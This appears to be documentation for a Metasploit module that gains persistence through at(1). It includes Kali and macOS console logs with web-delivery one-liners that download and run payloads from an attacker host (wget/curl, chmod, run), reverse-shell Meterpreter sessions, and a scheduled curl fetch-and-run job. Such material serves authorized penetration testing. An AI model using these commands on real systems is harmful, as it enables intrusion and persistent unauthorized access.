At - Metasploit Framework

Vulnerable Application

This module executes a metasploit payload utilizing at(1) to execute jobs at a specific time. It should work out of the box with any UNIX-like operating system with atd running.

Verified on Kali linux and OSX 13.7.4

OSX

In the case of OS X, the atrun service must be launched:

sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist

Kali

at isn't installed by default. sudo apt-get install at.

Verification Steps

Start msfconsole
Exploit a box via whatever method
Do: use exploit/multi/persistence/at
Do: set session #
exploit

Options

TIME

When to run job via at(1). Conforms to timespec. Examples can be found in the module's references.

Scenarios

Kali Linux

Initial access vector via web delivery

[*] Processing /home/mtcyr/.msf4/msfconsole.rc for ERB directives.
resource (/home/mtcyr/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/mtcyr/.msf4/msfconsole.rc)> setg lhost 192.168.10.144
lhost => 192.168.10.144
resource (/home/mtcyr/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/home/mtcyr/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/home/mtcyr/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/home/mtcyr/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/home/mtcyr/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/home/mtcyr/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 192.168.10.144:4545 
[*] Using URL: http://192.168.10.144:8181/PaulWjhBSpRlqAz
[*] Server started.
[*] Run the following command on the target machine:
wget -qO o20dAbhk --no-check-certificate http://192.168.10.144:8181/PaulWjhBSpRlqAz; chmod +x o20dAbhk; ./o20dAbhk& disown
[msf](Jobs:2 Agents:0) exploit(multi/script/web_delivery) > 
[*] 192.168.10.144   web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.10.144
[*] Meterpreter session 1 opened (192.168.10.144:4545 -> 192.168.10.144:42442) at 2025-02-06 11:40:00 -0500
[msf](Jobs:2 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/tmp) > sysinfo
Computer     : 192.168.10.144
OS           : Debian  (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 1)(/tmp) > background
[*] Backgrounding session 1...

Persistence

[msf](Jobs:2 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > set time "now +10 minutes"
time => now +10 minutes
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > set session 1
session => 1
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > exploit
[*] Command to run on remote host: curl -so ./tmoAoATss http://192.168.10.144:8080/aZRe4yWUN3U2-lDtdsaGlA;chmod +x ./tmoAoATss;./tmoAoATss&
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > [*] Fetch handler listening on 192.168.10.144:8080
[*] HTTP server started
[*] Adding resource /aZRe4yWUN3U2-lDtdsaGlA
[*] Started reverse TCP handler on 192.168.10.144:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
[*] Writing payload to /tmp//YneHFC
[*] Waiting for execution
[*] Meterpreter-compatible Cleaup RC file: /home/mtcyr/.msf4/logs/persistence/192.168.10.144_20250206.4241/192.168.10.144_20250206.4241.rc
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > date
[*] exec: date
Thu Feb  6 11:42:44 AM EST 2025
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > 
[*] Client 192.168.10.144 requested /aZRe4yWUN3U2-lDtdsaGlA
[*] Sending payload to 192.168.10.144 (curl/8.11.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.10.144
[*] Meterpreter session 2 opened (192.168.10.144:4444 -> 192.168.10.144:36212) at 2025-02-06 11:52:00 -0500
[msf](Jobs:3 Agents:2) exploit(multi/persistence/at) > date
[*] exec: date
Thu Feb  6 11:52:20 AM EST 2025

OSX 13.7.4

Initial access vector via web delivery

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 8
target => 8
resource (/root/.msf4/msfconsole.rc)> set srvport 8383
srvport => 8383
resource (/root/.msf4/msfconsole.rc)> set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4747
lport => 4747
resource (/root/.msf4/msfconsole.rc)> set URIPATH m
URIPATH => m
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4747 
[*] Using URL: http://111.111.1.111:8383/m
[*] Server started.
[*] Run the following command on the target machine:
curl -sk --output y9D7PFJd http://111.111.1.111:8383/m; chmod +x y9D7PFJd; ./y9D7PFJd& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] Meterpreter session 1 opened (111.111.1.111:4747 -> 222.22.2.2:49164) at 2025-02-21 16:59:10 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:2) exploit(multi/persistence/at) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/Users/macos) > getuid
Server username: macos
(Meterpreter 1)(/Users/macos) > sysinfo
Computer     : 20.20.20.21
OS           : macOS Ventura (macOS 13.7.4)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
(Meterpreter 1)(/Users/macos) >

Persistence

Already run: sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist

[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set time now +2 minutes
time => now +2 minutes
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > 
[*] Started reverse TCP handler on 111.111.1.111:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
[*] Writing payload to /tmp/NBcqC
[*] Writing '/tmp/NBcqC' (25 bytes) ...
[*] Writing '/tmp/NBcqCmk' (815032 bytes) ...
[+] at job created with id: 7
[*] Waiting up to sec for execution
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250221.0028/20.20.20.21_20250221.0028.rc
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.22.2.2:49165) at 2025-02-21 17:02:29 -0500